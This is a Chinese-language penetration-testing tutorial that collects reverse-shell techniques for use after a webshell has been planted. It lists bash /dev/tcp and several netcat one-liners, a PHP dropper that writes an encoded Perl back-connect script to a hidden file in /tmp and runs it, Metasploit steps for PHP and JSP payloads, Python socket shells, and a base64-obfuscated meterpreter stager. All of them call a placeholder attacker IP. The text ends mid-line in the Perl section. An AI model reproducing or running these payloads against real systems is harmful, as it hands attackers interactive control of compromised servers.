Web渗透中的反弹Shell

0x00

通过webshell反弹交互式shell是提权必备的一种手段。

0x01 linux下的反弹shell

1.

少数发行版的Linux的bash是可以直接反弹的。

bash i > & / dev / tcp / x . x . x . x / 2333 0 > & 1

2.借助NetCat

nc一般Linux都会自带。

nc e / bin / sh x . x . x . x 2333

但是有些Linux出于安全性，废掉了-e这个参数。

可以通过管道来解决。

rm / tmp / f ; mkfifo / tmp / f ; cat / tmp / f | / bin / sh i 2 > & 1 | nc x . x . x . x 2333 > / tmp / f

或者

nc x . x . x . x 2333 | / bin / sh | nc x . x . x . x 2444

或者

mknod backpipe p && telnet x . x . x . x 2333 0 < backpipe | / bin / bash 1 > backpipe

3.

Linux下的php反弹shell

<?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } $yourip = "x.x.x.x"; $yourport = "2333"; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; cf('/tmp/.bc',$back_connect); $res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); ?>

MSF也可以php反弹Linux的shell

msf > msfpayload php / reverse_php LHOST = x . x . x . x LPORT = 2333 R > re . php

msf > use multi / handler

msf exploit ( handler ) > set PAYLOAD php / reverse_php

msf exploit ( handler ) > set LHOST x . x . x . x

msf exploit ( handler ) > set LPORT 2333

msf exploit ( handler ) > exploit

4.

MSF也可以jsp反弹Linux的shell

msfpayload java / jsp_shell_reverse_tcp LHOST = x . x . x . x R > re . jsp

msf > use exploit / multi / handler

msf exploit ( handler ) > set PAYLOAD java / jsp_shell_reverse_tcp

msf exploit ( handler ) > set LHOST 192.168.10.1

msf exploit ( handler ) > exploit

5.

python也可以反弹shell

python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这个是一句版的反弹

importsocket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("x.x.x.x",2333)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]);

这个是存为.py文件的反弹

MSF也可以生成python的反弹payload。

msfvenom f raw p python / meterpreter / reverse_tcp LHOST = x . x . x . x LPORT = 2333

生成的文件类似这样。

importbase64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))

6.Perl

perl -e 'use Socket;$i="x.x.x,x